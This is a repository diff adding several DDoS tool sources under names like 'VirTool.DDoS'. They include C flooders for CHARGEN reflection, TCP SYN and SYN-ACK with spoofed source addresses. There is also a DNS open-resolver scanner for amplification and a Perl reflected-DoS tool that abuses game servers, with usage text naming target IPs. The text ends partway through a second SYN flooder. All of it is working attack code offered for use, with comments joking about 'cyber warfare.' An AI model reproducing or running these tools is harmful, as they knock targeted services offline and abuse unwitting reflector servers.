}
bcopy(hHost->h_addr, (char *)&addr.s_addr, hHost->h_length);
}
return addr.s_addr;
}

187
libs/VirTool.DDoS.CHARGEN.c Normal file
View File

@ -0,0 +1,187 @@
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
struct list *next;
struct list *prev;
};
struct list *head;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
{
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
/* function for header checksums */
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(19);
udph->check = 0;
strcpy((void *)udph + sizeof(struct udphdr), "h");
udph->len=htons(sizeof(struct udphdr) + 3);
}
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->source = sin.sin_port;
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
int i=0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
if(i==5)
{
usleep(0);
i=0;
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 4){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
exit(-1);
}
int i = 0;
head = NULL;
fprintf(stdout, "Setting up Sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
FILE *list_fd = fopen(argv[3], "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
fprintf(stdout, "Starting Flood...\n");
if(argc > 5)
{
sleep(atoi(argv[5]));
} else {
while(1){
sleep(1);
}
}
return 0;
}

BIN
libs/VirTool.DDoS.DB2AMP.7z Normal file
View File

Binary file not shown.

299
libs/VirTool.DDoS.DNS.c Normal file
View File

@ -0,0 +1,299 @@
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <math.h>
#include <stropts.h>
#include <ctype.h>
#include <errno.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
struct DNS_HEADER
{
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
};
struct QUESTION
{
unsigned short qtype;
unsigned short qclass;
};
#pragma pack(push, 1)
struct R_DATA
{
unsigned short type;
unsigned short _class;
unsigned int ttl;
unsigned short data_len;
};
#pragma pack(pop)
struct RES_RECORD
{
unsigned char *name;
struct R_DATA *resource;
unsigned char *rdata;
};
typedef struct
{
unsigned char *name;
struct QUESTION *ques;
} QUERY;
volatile int running_threads = 0;
volatile int found_srvs = 0;
volatile unsigned long per_thread = 0;
volatile unsigned long start = 0;
volatile unsigned long scanned = 0;
volatile int sleep_between = 0;
volatile int bytes_sent = 0;
volatile unsigned long hosts_done = 0;
FILE *fd;
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
{
int lock = 0 , i;
strcat((char*)host,".");
for(i = 0 ; i < strlen((char*)host) ; i++)
{
if(host[i]=='.')
{
*dns++ = i-lock;
for(;lock<i;lock++)
{
*dns++=host[lock];
}
lock++;
}
}
*dns++='\0';
}
void *flood(void *par1)
{
running_threads++;
int thread_id = (int)par1;
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
unsigned long w;
int y;
unsigned char *host = (unsigned char *)malloc(50);
strcpy((char *)host, ".");
unsigned char buf[65536],*qname;
struct DNS_HEADER *dns = NULL;
struct QUESTION *qinfo = NULL;
dns = (struct DNS_HEADER *)&buf;
dns->id = (unsigned short) htons(rand());
dns->qr = 0;
dns->opcode = 0;
dns->aa = 0;
dns->tc = 0;
dns->rd = 1;
dns->ra = 0;
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1);
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = htons(1);
qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
ChangetoDnsNameFormat(qname , host);
qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];
qinfo->qtype = htons( 255 );
qinfo->qclass = htons(1);
void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
memset(edns, 0x00, 1);
memset(edns+1, 0x29, 1);
memset(edns+2, 0xFF, 2);
memset(edns+4, 0x00, 7);
int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
int sock;
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
perror("cant open socket");
exit(-1);
}
for(w=ntohl(start_ip);w<htonl(end);w++)
{
struct sockaddr_in servaddr;
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(w);
servaddr.sin_port=htons(53);
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
bytes_sent+=24;
scanned++;
hosts_done++;
usleep(sleep_between*1000);
}
close(sock);
running_threads--;
return;
}
void sighandler(int sig)
{
fclose(fd);
printf("\n");
exit(0);
}
void recievethread()
{
printf("Started Listening Thread\n");
int saddr_size, data_size, sock_raw;
struct sockaddr_in saddr;
struct in_addr in;
unsigned char *buffer = (unsigned char *)malloc(65536);
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
if(sock_raw < 0)
{
printf("Socket Error\n");
exit(1);
}
while(1)
{
saddr_size = sizeof saddr;
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
if(data_size <0 )
{
printf("Recvfrom error , failed to get packets\n");
exit(1);
}
struct iphdr *iph = (struct iphdr*)buffer;
if(iph->protocol == 17)
{
unsigned short iphdrlen = iph->ihl*4;
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
unsigned char* payload = buffer + iphdrlen + 8;
if(ntohs(udph->source) == 53)
{
int body_length = data_size - iphdrlen - 8;
struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
if(dns->ra == 1)
{
found_srvs++;
fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
fflush(fd);
}
}
}
}
close(sock_raw);
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
exit(-1);
}
fd = fopen(argv[3], "a");
sleep_between = atoi(argv[5]);
signal(SIGINT, &sighandler);
int threads = atoi(argv[4]);
pthread_t thread;
pthread_t listenthread;
pthread_create( &listenthread, NULL, &recievethread, NULL);
char *str_start = malloc(18);
memset(str_start, 0, 18);
str_start = strcat(str_start,argv[1]);
str_start = strcat(str_start,".0.0.0");
char *str_end = malloc(18);
memset(str_end, 0, 18);
str_end = strcat(str_end,argv[2]);
str_end = strcat(str_end,".255.255.255");
start = inet_addr(str_start);
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
int i;
for(i = 0;i<threads;i++){
pthread_create( &thread, NULL, &flood, (void *) i);
}
sleep(1);
printf("Starting Scan...\n");
char *temp = (char *)malloc(17);
memset(temp, 0, 17);
sprintf(temp, "Found");
printf("%-16s", temp);
memset(temp, 0, 17);
sprintf(temp, "Host/s");
printf("%-16s", temp);
memset(temp, 0, 17);
sprintf(temp, "B/s");
printf("%-16s", temp);
memset(temp, 0, 17);
sprintf(temp, "Running Thrds");
printf("%-16s", temp);
memset(temp, 0, 17);
sprintf(temp, "Done");
printf("%s", temp);
printf("\n");
char *new;
new = (char *)malloc(16*6);
while (running_threads > 0)
{
printf("\r");
memset(new, '\0', 16*6);
sprintf(new, "%s|%-15lu", new, found_srvs);
sprintf(new, "%s|%-15d", new, scanned);
sprintf(new, "%s|%-15d", new, bytes_sent);
sprintf(new, "%s|%-15d", new, running_threads);
memset(temp, 0, 17);
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
sprintf(temp, "%d%%", percent_done);
sprintf(new, "%s|%s", new, temp);
printf("%s", new);
fflush(stdout);
bytes_sent=0;
scanned = 0;
sleep(1);
}
printf("\n");
fclose(fd);
return 0;
}

197
libs/VirTool.DDoS.DOMINATE.c Normal file
View File

@ -0,0 +1,197 @@
/*
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 1;
tcph->res2 = 3;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htons(65535);
tcph->check = 1;
tcph->urg_ptr = 1;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons (rand() % 2048);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "derped.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons (rand() % 2048);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Unable to allocate.\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

219
libs/VirTool.DDoS.DRDOS.pl Normal file
View File

@ -0,0 +1,219 @@
#!/usr/bin/perl -w
use Benchmark;
use Net::RawIP;
use Time::HiRes qw ( usleep );
my $rand = int( rand 0x400 );
my $frag = 0;
my $doff = 0x05;
my $ttl = 0xFF;
my $tos = 0x08;
my $pid;
my $tx;
my @list;
my @running;
my @pids;
my %attack =
( "tcp" => \&tcp, "quake3" => \&quake3, "source" => \&source, "hl" => \&hl, "gs" => \&gs, "gs2" => \&gs2 );
if ( @ARGV < 7 || @ARGV > 7 ) {
&usage();
exit;
}
$tx = $ARGV[3];
my $t0 = new Benchmark;
print "\n*** Now Reading Hosts Into Array\n\n";
open( ELITE, $ARGV[2] ) || die "Unable to open $ARGV[2]!\n";
chomp( @list = <ELITE> );
close(ELITE);
sub tcp {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl },
tcp => {
dest => $port,
source => $ARGV[1],
syn => 1,
ack => 0,
fin => 0,
rst => 0,
psh => 0,
urg => 0,
doff => $doff
}
}
);
$a->send( 0, $tx );
}
sub quake3 {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(255) . chr(255) . chr(255) . chr(255) . "getstatus" . chr(10),
}
}
);
$a->send( 0, $tx );
}
sub source {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . chr(85), }
}
);
$a->send( 0, $tx );
}
sub hl {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . "rules", }
}
);
$a->send( 0, $tx );
}
sub gs {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(92) . chr(115) . chr(116) . chr(97) . chr(116) . chr(117) . chr(115) . chr(92),
}
}
);
$a->send( 0, $tx );
}
sub gs2 {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
{
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(254)
. chr(253)
. chr(0)
. chr(67)
. chr(79)
. chr(82)
. chr(89)
. chr(255)
. chr(255)
. chr(255),
}
}
);
$a->send( 0, $tx );
}
sub paxor {
my $type = $_[0];
unless ( $type eq "mixed" ) {
while (1) {
foreach (@list) { $attack{$type}->( split( ':', $_ ) );}
}
}
else {
my @part;
while (1) {
foreach (@list) {
@part = split( ":", $_ );
$attack{ $part[2] }->( $part[0], $part[1]);
}
}
}
}
for($number = 0;$number < $ARGV[5];$number++)
{
$pid = fork();
if ( $pid == 0 ) {
$SIG{INT} = \&controlsub;
&paxor( $ARGV[4] );
my $t1 = new Benchmark;
my $td = timediff( $t1, $t0 );
print "\nTotal Time: ", timestr($td), "\n";
sleep(5);
exit;
}
else {
push(@pids, $pid);
}
}
sleep( $ARGV[6] );
foreach(@pids)
{
kill( "INT", $_ );
}
exit;
sub controlme {
$SIG{INT} = \&controlme;
print "Signal Caught Now Exiting\n";
my $t1 = new Benchmark;
my $td = timediff( $t1, $t0 );
print "\nTotal Time: ", timestr($td), "\n";
sleep(5);
exit;
}
sub controlsub {
$SIG{INT} = \&controlsub;
exit;
}
sub usage {
print << "HEREDOC";
$0 <target> <target port> <reflector list> <weight> <attack type> <threads> <Time>
DrDOS Tool V1.8 FINAL by ohnoes1479
Time: Limit running time of the script, Time is in seconds
threads: number of threads to run
attack types:
tcp: reflected tcp SYN attack
quake3: reflected udp attack using quake3 based servers
source: reflected udp attack using Valve Source based servers
hl: reflected udp attack using Half Life servers
gs: reflected udp attack using Gamespy based servers
gs2: reflected udp attack using Gamespy 2 based servers
mixed: specify type of server in list, EG:
8.8.8.8:80:tcp
64.120.46.100:28960:quake3
Command: $0 127.0.0.1 8080 servers.txt 5 tcp
HEREDOC
}

200
libs/VirTool.DDoS.ESSYN-ACK.c Normal file
View File

@ -0,0 +1,200 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = rand();
tcph->res2 = 0;
tcph->doff = 5;
tcph->syn = 1;
tcph->ack = 1;
tcph->window = rand();
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

218
libs/VirTool.DDoS.ESSYN.c Normal file
View File

@ -0,0 +1,218 @@
/*
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
